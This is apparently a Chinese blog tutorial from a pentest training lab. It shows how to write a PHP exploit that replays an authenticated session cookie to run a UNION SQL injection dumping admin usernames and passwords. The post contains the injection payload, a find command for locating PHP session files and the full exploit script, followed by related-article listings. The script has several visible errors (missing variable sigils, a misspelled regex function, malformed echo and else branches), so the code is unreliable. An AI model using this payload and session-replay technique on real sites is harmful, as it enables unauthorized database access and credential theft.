exp缩写篇需要验证的exp编写

最新推荐文章于 2024-03-21 18:08:12 发布
最新推荐文章于 2024-03-21 18:08:12 发布
阅读量281 收藏 2
点赞数 1
分类专栏: exp 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yyj1781572/article/details/127617183
版权

1.访问暗月靶场测试系统  账号和密码分别为moon 123456

 

利用"article.php?id=-1%20union%20select%201,2,group_concat(0x7e,username,0x3a,password,0x7e)%20from%20admin"写入url中获取cookie。

如果不登录的情况下直接访问url页面是会返回登录后再进行访问 这种情况下编写exp同样是返回登录后再进行访问。

 

$_SESSION['name']=$username;    

在linux下面查找session的命令

find / -name **gpcjcspj2oje5j3h2dtb8c8895

登入成功后查看文件里就会存在moon

如图

遇到有权限认证的页面就可以通过登录后的session 再提交数据的时候也提交就可以了

详细代码exp05.php

​
​
<?php
$site="www.moontester.com";
$payload="article.php?id=-1%20union%20select%201,2,group_concat(0x7e,username,0x3a,password,0x7e)%20from%20admin";
$key="PHPESSID=gpcjcspj2oje5j3h2dtb8c8895";
function send_http($site,$payload,$key){
	$fp=fsockopen(site,80,$errno,$errstr,30);
	if(!$fp){
		echo "$errstr (errno)<br />\n";	
	}else{
		$out="GET /{payload} HTTP/1.1\r\n";
		$out.="Host:{$site} \r\n";
		$out.="Connection:keep-alive\r\n\r\n";
		$out.="Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
		$out.="Cookie:{$key}\r\n";
		fwrite($fp,$out);
		while(!feof($fp)){
			$resp.=fgets($fp,1024);
		}
		fclose($fp);
		return $resp;
	}
}
$html=send_http($site,$payload,$key);
if($html){
	pre_match('/~(.*?)~/',$html,$m);
	if($m[1]){
		echo "[+]{$m[1][+]";
	}else{
		echo"[!]error[!]";
	}else{
		echo"[!]error[!]";
	}                                                                             
}

​

​

运行exp05.php,得到数据

 

 

 

 

 

jack-yyj
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Poc/Exp漏洞验证利用脚本编写
悦分享
07-07 5549
一、安全名词1. POCPOC,Proof ofConcept,中⽂意思是“观点证明”。这个短语会在漏洞报告中使⽤,漏洞报告中的POC则是⼀段说明或者⼀个攻击的样例,使得读者能够确认这个漏洞是真实存在的。2. EXPEXPExploit,中文叫漏洞利用程序。意思就是该漏洞存在公开的利用方式(比如一个脚本),就是一段可以发挥漏洞价值的程序,对漏洞如何利⽤的详细说明或者⼀个演⽰的漏洞攻击代码,可以使得读者完全了解漏洞的机理以及利⽤的⽅法。想象一下这样的场景,目标存在一个 SQL 注入漏洞,然后被你知道了,然后
CVE-2020-0796 POC EXP.zip
04-01
"exp"则是Exploit的缩写,指的是利用漏洞进行攻击的代码。"CVE-2020-0796-LPE-EXP-master.zip"中的"LPE"代表Local Privilege Escalation(本地权限提升),意味着这个Exploit可能能够帮助攻击者从一个较低的权限级别...
exp编写
最新发布
qq_74378387的博客
03-21 330
在https://www.exploit-db.com/ 漏洞库里面 每天都可以很多新的漏洞发布。可是新的漏洞很多漏洞发布者 ,都是只给代码漏洞部分,更多的是没有详细的分析。更别说是漏洞利用程序了。掌握漏洞编写的技能,随心所欲地编写漏洞利用程序,不仅能简化测试过程,而且可以让漏洞程序多种多样满足我们的需要。一般的们多数接触的是WEB安全漏洞 (Web Application Exploits)这类较多。一般只需理解和掌握http协议即可。简单的html基础也可以编写EXP了。
exp编写笔记
qq_42863961的博客
08-19 334
能帮到你的话,就给个赞吧 ???? python2 -c “print ‘A’*44 + ‘\x59\x86\x04\x08’” | ./ret2win32:python2 -c 是执行代码。| :管道
POC-EXP编写
weixin_44110913的博客
08-18 3097
文章目录POC一.概念二.思维图解三.代码演示EXP一.概念二.思维图解三.代码演示 POC 一.概念 漏洞刚被批漏之后,有时候现有的工具里面是没有相应的poc的,那我们可以根据原理写出对应的poc代码,验证漏洞是否存在。 作用:用于漏洞验证,更加高效的快速挖掘漏洞,而不是手工测试,节省时间。 二.思维图解 深入了解漏洞原理 拼接payload到url中或者header头和cookies中(大多数情况都这样) 发起请求 通过响应头判断中间件和脚本版本 根据其漏洞特征,判断该漏洞是否存在 三.代码演示
简单的poc以及exp编写(入门
热门推荐
LINGOVO的博客
12-18 1万+
本文中主要针对的是Web应用渗透中的漏洞,而与Web应用之间的交互大多是基于HTTP协议的。所以用到python中与HTTP协议相关的一些模块 一、何为POC和EXP POC Proof of Concept中文意思是“观点证明”,是用来检测是否存在漏洞的脚本 EXP Exploit的中文意思是“漏洞利用”,是用来利用该漏洞的脚本 二、基础环境Python3 HTTP 方法 内容 GET 获取资源 POST 传输实体主体 PUT 传输文件 HEAD 获得响应报文首部
2023HW漏洞POC、EXP.zip
11-17
EXP则是exploit的缩写,指的是利用该漏洞进行攻击的实际工具或代码。 在描述中,“2023HW漏洞POC、EXP.zip”再次确认了压缩包内容,即关于2023年HW漏洞的POC和EXP文档。由于没有提供更多的具体描述,我们只能基于...
0exp_matlab_SVM_
10-03
2. "PR_exp":这可能是“Precision and Recall”实验的缩写,PR曲线是评估分类模型性能的一种方法,尤其是对于不平衡数据集。这个文件可能包含相关的MATLAB代码,用于绘制PR曲线并分析模型性能。 3. "libsvm-3.24":...
Exp_UltraMFI_MMRec - MetaTrader 5EA.zip
09-13
文章将深入探讨名为"Exp_UltraMFI_MMRec"的MetaTrader 5 EA,该系统是基于 UltraMFI 指标的交易策略。 UltraMFI 指标是MetaTrader 5中的一种技术分析工具,它是对标准的Market Facilitation Index (MFI) 的...
oracle11g数据库三种方式导入导出必备的exe文件
06-16
2. **imp.exe**: IMP是Import的缩写,它是与exp.exe配套使用的数据导入工具。imp.exe用于将exp.exe生成的转储文件重新导入到数据库中,实现数据的恢复或者迁移。它可以处理各种类型的数据,包括表、索引、视图、序列...
dvwa学习编写exp
p_utao的博客
04-09 276
sql注入报错exp import requests import re //cookie验证登录 cookies = {"PHPSESSID":'jjfrgqtge5n0a03ge127ti8ttk','security':'low'} //可能存在sql注入地址 url = "http://127.0.0.1/vulnerabilities/sqli/?Submit=Submit%23&id=1" //index()函数用于从列表中找出某个值第一个匹配项的索引位置 //split()通过指定分
python学习之ecshop exp编写
cxk
06-04 498
python学习之ecshop exp编写 针对ecshop 2.x,漏洞分析请查看网上分析,不再赘述。 # -*- coding:utf-8 -*- import requests import time def ecshop(url): time.sleep(5) url_exp=url+"/user.php" a = "554fcae493e564ee0dc7...
渗透测试_需要验证EXP编写
weixin_54227009的博客
05-18 311
记一次笔记 fsockopen — 打开一个网络连接或者一个Unix套接字连接 参数:hostname:网址 port:端口 errstr:错误返回信息 timeout:超时时间 靶机登录界面 登录成功界面 如果不登录直接访问main.php的话,是有账号密码验证的,是进不去的 因为界面有session 进行验证 h4pb2rtsfrsihh8h629emrm9s4 所以抓包直接把session放进去试试 这里...
Python大黑阔—url采集+exp验证,带你批量测试
dfdhxb995397的博客
06-06 3992
i春秋作家:大木瓜 前言: 最近几天在整理从各处收集来的各种工具包,大大小小的塞满了十几个G的硬盘,无意间发现了一个好几年前的0day。心血来潮就拿去试了一下,没想到真的还可以用,不过那些站点都已经老的不像样了,个个年久失修,手工测了几个发现,利用率还挺可观,于是就想配合url采集器写一个批量exp脚本。于是就有了今天这一文。结尾附上一枚表哥论坛的邀请码一不小心买多了。先到先得哦。...
SQL注入到EXP编写
weixin_30448603的博客
04-20 572
0x00 盲注简介: 顾名思义,像盲人一样注入(什么鬼解释…),通俗来说,当我们发现有SQL注入时,确不能得到SQL查询的数据回显,除了之前的写文件方式,还有就是盲注了,盲注就是通过服务器返回的状态等各种因素来猜测,最终组合得到哦我们想要的数据。 0x01 盲注必须知识: SQL盲注中常用的几个内置函数,了解一下 length(str):返回str字符串的长度。 substr(str...
EXP验证exp的dump包中包含procedure的创建语句
cuanchuwei1207的博客
03-11 226
EXP后的dump包中包含procedure的定义语句,简单做一个实验验证之,供参考。1.在sec用户下创建一个简单的proceduresec@ora10g> CREATE OR REPLACE PROCEDUR...
渗透测试常用术语总结
xv66666的博客
07-02 2399
想象自己是一个特工,你的目标是监控一个重要的人,有一天你怀疑目标家里的窗子可能没有关,于是你上前推了推,结果推开了,这是一个POC。之后你回去了,开始准备第二天的渗透计划,第二天你通过同样的漏洞渗透进了它家,仔细查看了所有的重要文件,离开时还安装了一个隐蔽的录音笔,这一天你所做的就是一个EXP,你在他家所做的就是不同的Payload,就把录音笔当作Shellcode吧!
在渗透中poc exp payload shellcode的具体含义(小宇特详解)
小宇的web博客
06-24 2011
在渗透中poc exp payload shellcode的具体含义(小宇特详解) 具体含义 1.POC:全称 ’ Proof of Concept ',中文 ’ 概念验证 ’ ,常指一段漏洞证明的代码。 2.EXP:全称 ’ Exploit ',中文 ’ 利用 ',指利用系统漏洞进行攻击的动作。 3.Payload:中文 ’ 有效载荷 ',指成功exploit之后,真正在目标系统执行的代码或指令。 4.Shellcode:简单翻译 ’ shell代码 ',是Payload的一种,由于其建立正向/反向she
EXP脚本编写
m0_62207482的博客
01-27 882
EXP脚本编写与POC脚本编写一样,只需要修改_attack部分,替换成漏洞 利用的脚本即可。Flask漏洞主要利用了框架的特点,在Flask中,“ {{}}” 中的内容会被当作代码 执行,相应的防御中就需要对“ {{}}”进行过滤,禁止此符号传入参数中。利用Pocsuite 3开源框架,可以接收用户输入的命令行参数,对目标系统进行 半交互控制,具体实现过程如下所示。首先,根据官方文档说明,编写一个接收自定义命令的函数,将接收到的命 令赋值给command参数。,最终效果如 图3-5所示。
Oracle EXPIMP命令完全指南
"这文档是关于Oracle数据库中的 EXPIMP 命令的详细解析,由杨健撰写,主要涵盖了 EXP 和 IMP 命令的各种参数及其用法,旨在帮助用户理解和掌握数据导出导入操作。" Oracle数据库的EXPIMP工具是用于数据迁移、备份...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

jack-yyj

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值